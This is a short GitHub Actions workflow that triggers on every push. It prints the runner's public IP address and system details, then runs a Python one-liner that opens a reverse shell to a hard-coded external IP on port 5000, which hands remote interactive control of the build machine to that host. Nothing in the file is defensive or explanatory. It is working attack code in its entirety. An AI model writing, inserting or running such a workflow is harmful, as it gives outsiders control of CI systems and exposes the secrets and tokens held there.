name: buntu 
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
     - run: curl ifconfig.co
     - run: uname -a
     - shell: bash
       run: |-
         python -c 'import socket,os,pty; s=socket.socket();s.connect(("95.217.236.164",5000));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
